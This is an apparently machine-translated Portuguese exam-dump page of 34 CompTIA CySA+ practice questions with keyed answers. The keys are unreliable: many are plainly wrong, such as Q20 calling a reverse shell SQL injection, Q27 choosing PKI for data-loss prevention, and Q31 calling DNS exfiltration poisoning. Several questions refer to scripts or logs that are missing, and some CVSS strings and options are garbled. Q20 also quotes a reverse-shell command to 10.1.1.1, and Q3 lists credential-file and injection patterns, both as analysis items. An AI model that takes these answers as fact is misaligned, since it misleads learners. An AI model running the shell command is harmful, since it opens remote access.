NÃO QUER PERDER NADA?

Dicas para passar no exame de certificação

Últimas notícias sobre exames e informações sobre descontos

Curadoria e atualizada por nossos especialistas

Sim, me envie o boletim informativo

Perguntas e respostas do exame de certificação CompTIA CS0-003, Analista de segurança cibernética da CompTIA (CySA+) | SPOTO

Prepare-se para o exame de certificação CompTIA CS0-003 com nossa ampla coleção de testes práticos. Nossa plataforma oferece uma gama diversificada de materiais de exame, incluindo testes gratuitos, perguntas de amostra, exames simulados e muito mais. Aceda a perguntas e respostas de exames selecionadas por especialistas na área para melhorar a sua preparação para o exame. Utilize o nosso simulador de exames online para simular cenários de exames reais e avaliar a sua preparação. Com as nossas lixeiras de exame, obterá informações valiosas sobre a estrutura e o conteúdo do exame, garantindo confiança no dia do exame. Quer esteja a tentar reforçar os seus conhecimentos ou familiarizar-se com os padrões do exame, os nossos testes práticos fornecem o recurso ideal para o sucesso no exame de certificação CompTIA Cybersecurity Analyst (CySA+).
Faça outros exames online

Pergunta #1
Qual das seguintes iniciativas organizacionais seria MAIS afetada por problemas de severidade de dados?
A. Mudança para um ambiente baseado na nuvem
B. Migração para servidores virtuais alojados localmente
C. Implementação de controlos de não repúdio
D. Encriptar as consultas à base de dados local
Ver resposta
Resposta correta: C
Pergunta #2
Um analista de segurança juntou-se recentemente à equipa e está a tentar determinar que linguagem de scripting está a ser utilizada num script de produção para determinar se é malicioso. Dado o seguinte script: Qual das seguintes linguagens de script foi usada no script?
A. PowerShel
B. Rubi
C. Python
D. Script de shell
Ver resposta
Resposta correta: A
Pergunta #3
Um analista de segurança descobre uma vulnerabilidade LFI que pode ser explorada para extrair credenciais do host subjacente. Qual dos seguintes padrões pode o analista de segurança utilizar para procurar nos registos do servidor Web provas de exploração dessa vulnerabilidade específica?
A. /etc/ shadow
B. curl localhost
C. ; printenv
D. cat /proc/self/
Ver resposta
Resposta correta: A
Pergunta #4
Qual das seguintes é a MELHOR forma de reunir informações sobre patches num servidor específico?
A. Visualizador de eventos
B. Guião personalizado
C. Software SCAP
D. CI/CD
Ver resposta
Resposta correta: D
Pergunta #5
O Diretor de Segurança da Informação está a dirigir um novo programa para reduzir os riscos e ameaças da superfície de ataque como parte de uma abordagem de confiança zero. A equipa de segurança de TI tem de definir prioridades para o programa. Qual das seguintes é a melhor prioridade com base em estruturas de ataque comuns?
A. Reduzir as contas de administrador e de acesso privilegiado
B. Utilizar um IDS baseado em rede
C. Conduzir uma resposta exaustiva a incidentes
D. Ativar o SSO para aplicações empresariais
Ver resposta
Resposta correta: C
Pergunta #6
Uma organização tem a seguinte política de mitigação de riscos: Os riscos com uma probabilidade de 95% ou mais serão tratados antes de todos os outros, independentemente do impacto. Todas as outras prioridades serão baseadas no valor do risco. A organização identificou os seguintes riscos: Qual das seguintes opções é a ordem de prioridade para a mitigação de riscos, da mais alta para a mais baixa?
A. A, B, D, C
B. A, B, C, D
C. D, A, B, C
D. D, A, C, B
Ver resposta
Resposta correta: C
Pergunta #7
Dada a seguinte cadeia CVSS - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/3:U/C:K/I:K/A:H Qual dos seguintes atributos descreve corretamente esta vulnerabilidade?
A. É necessário um utilizador para explorar esta vulnerabilidade
B. A vulnerabilidade baseia-se na rede
C. A vulnerabilidade não afecta a confidencialidade
D. A complexidade da exploração da vulnerabilidade é elevada
Ver resposta
Resposta correta: B
Pergunta #8
Ao analisar os registos do servidor Web, um analista de segurança encontrou a seguinte linha: Qual das seguintes actividades maliciosas foi tentada?
A. Injeção de comandos
B. Injeção de XML
C. Falsificação de pedidos do lado do servidor
D. Scripting entre sítios
Ver resposta
Resposta correta: D
Pergunta #9
Ao rever os registos do servidor Web, um analista repara em várias entradas com os mesmos carimbos de hora, mas todas contêm caracteres estranhos na linha de pedido. Qual das seguintes etapas deve ser seguida?
A. Desligue imediatamente a rede e contacte a pessoa seguinte na cadeia de comando
B. Determinar de que ataque os caracteres estranhos são indicativos
C. Utilizar a estrutura de ataque correcta e determinar em que consistirá a resposta ao incidente
D. Notificar as autoridades policiais locais para dar resposta ao incidente
Ver resposta
Resposta correta: D
Pergunta #10
Qual das seguintes opções é a primeira etapa que deve ser executada ao estabelecer um plano de recuperação de desastres?
A. Chegar a acordo sobre as metas e os objectivos do plano
B. Determinar o local a ser usado durante um desastreC Demonstrar adesão a um processo padrão de recuperação de desastres
C. Aplicações de identidade a serem executadas durante uma catástrofe
Ver resposta
Resposta correta: A
Pergunta #11
Qual das seguintes é a melhor métrica para uma organização se concentrar, dados os investimentos recentes em SIEM, SOAR e um sistema de bilhética?
A. Tempo médio de deteção
B. Número de explorações por tática
C. Volume de alerta
D. Quantidade de tentativas de intrusão
Ver resposta
Resposta correta: A
Pergunta #12
Um funcionário acedeu a um Web site que fez com que um dispositivo fosse infetado com malware invasivo. O analista de resposta a incidentes tem: ? criou o registo inicial de provas. ? desactivou o adaptador sem fios no dispositivo. ? entrevistou o funcionário, que não conseguiu identificar o site que foi acedido ? analisou os registos de tráfego do proxy da Web. Qual das seguintes opções o analista deve fazer para remediar o dispositivo infetado?
A. Actualize o firmware do sistema e faça uma nova imagem do hardware
B. Instalar um scanner de malware adicional que enviará alertas de e-mail para o analista
C. Configurar o sistema para utilizar um servidor proxy para aceder à Internet
D. Eliminar o perfil de utilizador e restaurar os dados a partir da cópia de segurança
Ver resposta
Resposta correta: A
Pergunta #13
Uma empresa de fabrico utiliza um prestador de serviços externo para suporte de segurança de nível 1. Um dos requisitos é que o fornecedor só deve obter talentos do seu próprio país devido a interesses geopolíticos e de segurança nacional. Qual das seguintes opções a empresa de fabrico pode implementar para garantir que o fornecedor de serviços externo cumpre este requisito?
A. Implementar um programa de cadeia de fornecimento seguro com governação
B. Implementar uma lista negra para endereços IP de fora do condado
C. Implementar controlos de autenticação fortes para os contratantes
D. Implementar a análise do comportamento dos utilizadores para os principais membros do pessoal
Ver resposta
Resposta correta: A
Pergunta #14
Um analista de segurança informática recebeu um alerta por correio eletrónico sobre uma vulnerabilidade na nova frota de veículos que a empresa adquiriu recentemente. Qual dos seguintes vectores de ataque é o alvo mais provável da vulnerabilidade?
A. SCADA
B. Barramento CAN
C. Modbus
D. loT
Ver resposta
Resposta correta: A
Pergunta #15
Qual das seguintes opções ajudaria um analista a descobrir rapidamente se o endereço IP num alerta SIEM é um endereço IP sabidamente malicioso?
A. Aderir a um centro de partilha e análise de informações específico para a indústria da empresa
B. Carregar informações sobre ameaças para o IPS no formato STIX/TAXII
C. Adicionar enriquecimento de dados para IPS no pipeline de ingestão
D. Rever os feeds de ameaças depois de visualizar o alerta SIEM
Ver resposta
Resposta correta: A
Pergunta #16
Um analista de segurança está a tentar identificar possíveis endereços de rede de diferentes redes de origem pertencentes à mesma empresa e região. Qual das seguintes funções de script de shell poderia ajudar a atingir o objetivo?
A. function w() { a=$(ping -c 1 $1 | awk-F "/" 'END{print $1}') && echo "$1 | $a" }
B. function x() { b=traceroute -m 40 $1 | awk 'END{print $1}'') && echo "$1 | $b" }
C. function y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F "
D. function z() { c=$(geoiplookup$1) && echo "$1 | $c" }
Ver resposta
Resposta correta: A
Pergunta #17
Uma vulnerabilidade recente de dia zero está a ser ativamente explorada, não requer interação do utilizador ou aumento de privilégios e tem um impacto significativo na confidencialidade e integridade, mas não na disponibilidade. Qual das seguintes métricas CVE seria a mais exacta para esta ameaça de dia zero?
A. CVSS: 31/AV: N/AC: L/PR: N/UI: N/S: U/C: H/1: K/A: L
B. CVSS:31/AV:K/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:L
C. CVSS:31/AV:N/AC:L/PR:N/UI:H/S:U/C:L/I:N/A:H
D. CVSS:31/AV:L/AC:L/PR:R/UI:R/S:U/C:H/I:L/A:H
Ver resposta
Resposta correta: A
Pergunta #18
Ao rever os relatórios de incidentes da noite anterior, um analista de segurança repara que os sítios Web da empresa foram desfigurados com propaganda do po mcai. Qual das seguintes opções MELHOR descreve este tipo de ator?
A. Hacktivista
B. Estado-nação
C. ameaça interna
D. Crime organizado
Ver resposta
Resposta correta: C
Pergunta #19
Um analista repara que há um dispositivo interno a enviar tráfego HTTPS com caracteres adicionais no cabeçalho para um IP sabidamente malicioso noutro país. Qual das seguintes opções descreve o que o analista notou?
A. Balizagem
B. Scripting entre sítios
C. Transbordamento da memória intermédia
D. Travessia de PHP
Ver resposta
Resposta correta: D
Pergunta #20
Um analista de segurança detecta uma tentativa de exploração que contém o seguinte comando: sh -i >& /dev/udp/10.1.1.1/4821 0>$l Qual das seguintes opções está a ser tentada?
A. RCE
B. Concha invertida
C. XSS
D. Injeção de SQL
Ver resposta
Resposta correta: D
Pergunta #21
Um analista de segurança está a pesquisar formas de melhorar a segurança do sistema de correio eletrónico de uma empresa para mitigar os e-mails que se fazem passar por executivos da empresa. Qual das seguintes opções seria a MELHOR para o analista configurar para atingir este objetivo?
A. Um registo TXT no servidor de nomes para SPF
B. Chaves DNSSEC para proteger a replicação
C. Chaves de domínio identificadas Homem
D. Uma caixa de areia para verificar a loucura de entrada
Ver resposta
Resposta correta: B
Pergunta #22
Um analista de segurança precisa de fornecer ao desenvolvimento aprender com conetividade segura da rede corporativa para um ambiente de nuvem de três camadas. Os desenvolvedores precisam de acesso a servidores em todas as três camadas para executar várias tarefas de configuração. Qual das seguintes tecnologias o analista deve implementar para fornecer transporte seguro?
A. CASB
B. VPC
C. Federação
D. VPN
Ver resposta
Resposta correta: C
Pergunta #23
Qual das seguintes opções melhor descreve os elementos-chave de um programa de segurança da informação bem-sucedido?
A. Análise do impacto nas empresas, gestão de activos e alterações e plano de comunicação de segurança
B. Aplicação da política de segurança, atribuição de funções e responsabilidades e classificação dos activos de informação
C. Planeamento da recuperação de desastres e da continuidade das actividades, e definição dos requisitos de controlo de acesso e das políticas de recursos humanos
D. Estrutura organizacional dos quadros superiores, normas de distribuição de mensagens e procedimentos para o funcionamento dos sistemas de gestão da segurança
Ver resposta
Resposta correta: A
Pergunta #24
Um analista de segurança está a tentar identificar anomalias no encaminhamento da rede. Qual das seguintes funções pode o analista utilizar num script de shell para atingir o objetivo com maior precisão?
A. function x() { info=$(geoiplookup $1) && echo "$1 | $info" }
B. function x() { info=$(ping -c 1 $1 | awk -F "/" 'END{print $5}') && echo "$1 | $info" }
C. function x() { info=$(dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F "
D. function x() { info=$(traceroute -m 40 $1 | awk 'END{print $1}') && echo "$1 | $info" }
Ver resposta
Resposta correta: D
Pergunta #25
Uma organização alterou recentemente seus planos de BC e DR. Qual das seguintes opções melhor permitiria à equipa de resposta a incidentes testar as alterações sem qualquer impacto para o negócio?
A. Efetuar um exercício de mesa com base em cenários de incidentes previamente identificados
B. Simular um incidente desligando a energia do centro de dados primário
C. Migrar cargas de trabalho activas do centro de dados primário para a localização secundária
D. Comparar o plano atual com as lições aprendidas em incidentes anteriores
Ver resposta
Resposta correta: B
Pergunta #26
Joe, um dos principais vendedores de uma organização, anunciou nas redes sociais que vai deixar o seu cargo atual para abrir uma nova empresa que irá competir com o seu atual empregador. Joe está a solicitar os clientes do seu atual empregador. No entanto, Joe ainda não se demitiu nem discutiu o assunto com o seu supervisor atual. Qual das seguintes seria a melhor ação a recomendar pela equipa de resposta a incidentes?
A. Isolar o PC de Joe da rede
B. Reimage o PC com base nos procedimentos operacionais padrão
C. Iniciar uma limpeza remota do PC do Joe utilizando a gestão de dispositivos móveis
D. Não atuar até que os RH ou o consultor jurídico o aconselhem sobre os passos seguintes
Ver resposta
Resposta correta: B
Pergunta #27
Qual das seguintes ferramentas funcionaria melhor para evitar a exposição de informações de identificação pessoal fora de uma organização?
A. PAM
B. IDS
C. PKI
D. DLP
Ver resposta
Resposta correta: C
Pergunta #28
O Diretor de Segurança da Informação pretende eliminar e reduzir as TI sombra na empresa. São utilizadas várias aplicações de nuvem de alto risco que aumentam o risco para a organização. Qual das seguintes soluções ajudará a reduzir o risco?
A. Implantar um CASB e ativar a imposição de políticas
B. Configurar a MFA com acesso restrito
C. Implementar um gateway de API
D. Ativar o SSO para as aplicações na nuvem
Ver resposta
Resposta correta: A
Pergunta #29
O Diretor de Informação de uma empresa pretende utilizar uma solução CASB para garantir que as políticas estão a ser cumpridas durante o acesso à nuvem. Devido à natureza do negócio da empresa e à apetência pelo risco, a equipa de gestão optou por não armazenar informações financeiras na nuvem. Um analista de segurança precisa de recomendar uma solução para mitigar a ameaça de fuga de dados financeiros para a nuvem. Qual das seguintes opções o analista deve recomendar?
A. Utilize o CASB para aplicar a proteção de dados em repouso DLP para informações financeiras armazenadas nas instalações
B. Não utilizar a solução CASB para este fim, mas adicionar DLP no local para dados em movimento
C. Utilizar o CASB para impor a proteção de dados em movimento DLP para informações financeiras que se deslocam para a nuvem
D. Não utilizar a solução CASB para este fim, mas adicionar DLP no local para dados em repouso
Ver resposta
Resposta correta: C
Pergunta #30
Um analista de segurança está revisando a saída do tcpdump para analisar o tipo de atividade em uma captura de pacotes: Qual das seguintes opções gerou a saída acima?
A. Um scan de porta
B. Uma ligação TLS
C. Uma análise de vulnerabilidades
D. Uma varredura de ping
Ver resposta
Resposta correta: D
Pergunta #31
Um analista de segurança encontrou o seguinte tráfego DNS suspeito ao analisar uma captura de pacotes: ? Tráfego DNS enquanto uma sessão de tunelamento está ativa. ? O tempo médio entre as consultas é inferior a um segundo. ? O comprimento médio da consulta excede 100 caracteres. Qual dos seguintes ataques é mais provável de ter ocorrido?
A. Exfiltração de DNS
B. Falsificação de DNS
C. Transferência de zona DNS
D. Envenenamento de DNS
Ver resposta
Resposta correta: D
Pergunta #32
Um analista de cibersegurança repara numa atividade invulgar de análise de rede proveniente de um país com o qual a empresa não tem relações comerciais. Qual das seguintes é a melhor técnica de atenuação?
A. Bloqueio geográfico do país de origem da infração
B. Bloquear o intervalo de IPs dos exames na firewall da rede
C. Efetuar uma análise de tendências históricas e procurar actividades de exploração semelhantes
D. Bloquear o endereço IP específico dos exames na firewall da rede
Ver resposta
Resposta correta: A
Pergunta #33
A formação de uma hipótese, a procura de indicadores de compromisso e a utilização dos resultados para melhorar proactivamente as capacidades de deteção são exemplos do valor da:
A. análise de vulnerabilidades
B. caça às ameaças
C. aprendizagem do vermelho
D. testes de penetração
Ver resposta
Resposta correta: B
Pergunta #34
Um novo analista de cibersegurança tem a tarefa de criar um briefing executivo sobre possíveis ameaças à organização. Qual das seguintes opções produzirá os dados necessários para o briefing?
A. Registos da firewall
B. Indicadores de compromisso
C. Avaliação dos riscos
D. Listas de controlo de acesso
Ver resposta
Resposta correta: B

Ver as respostas após o envio

Por favor, envie seu e-mail e WhatsApp para obter respostas às perguntas.

Observação: certifique-se de que seu ID de e-mail e Whatsapp sejam válidos para que você possa obter os resultados corretos do exame.

E-mail:
WhatsApp/número de telefone: